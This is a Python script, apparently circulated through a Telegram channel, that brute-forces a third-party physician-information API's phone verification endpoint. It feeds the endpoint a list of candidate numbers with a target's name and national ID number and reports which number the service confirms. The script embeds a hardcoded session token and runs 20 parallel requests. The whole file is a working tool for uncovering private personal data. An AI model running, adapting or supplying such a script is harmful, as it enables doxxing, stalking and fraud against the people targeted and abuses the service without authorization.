print("频道@yywnyywn")
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import time

def read_phone_numbers_from_file(file_path):

    phone_numbers = []
    with open(file_path, 'r') as file:
        for line in file:
            line = line.strip()
            if line:
                phone_numbers.append(line)
    return phone_numbers

def check_info(phone, name, id_num):

    url = 'https://api.greenboniot.cn/dm/api/v1/physicianinfo/mobile3Check'
    headers = {
        'Host': 'api.greenboniot.cn',
        'Connection': 'keep-alive',
        'Content-Length': '0',
        'accept': 'application/json; charset=utf-8',
        'content-type': 'application/x-www-form-urlencoded',
        'auth-version': 'v2',
        'gb-tenant-id': '1',
        'gb-part-tenant-id': '912793402364416004',
        'terminal-type': 'miniProgram-de',
        'satoken': 'rYwwCISBRv3ZDjARZCl1dw9mlZAxJy0bRtiOrOgoWqjXEgPqeDCjRP04ABr5',
    }
    data = {
        'idNum': id_num,
        'name': name,
        'phone': phone
    }
    try:
        response = requests.post(url, headers=headers, data=data)
        result = response.json()
        return result
    except requests.RequestException as e:
        print(f"请求出现错误: {e}")
        return None

if __name__ == "__main__":

    file_path = "手机号.txt"
    name = input("请输入姓名: ")
    id_num = input("请输入身份证号码: ")
    phone_numbers = read_phone_numbers_from_file(file_path)
    max_workers = 20 
    start_time = time.time()
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        future_to_phone = {executor.submit(check_info, phone, name, id_num): phone for phone in phone_numbers}
        for future in as_completed(future_to_phone):
            phone = future_to_phone[future]
            result = future.result()
            if result and result.get('code') == 0 and result.get('data'):
                print(f"{phone} ✅验证成功")
            else:
                print(f"{phone} ❌验证失败")
    end_time = time.time()
    print(f"总共耗时: {end_time - start_time} 秒")
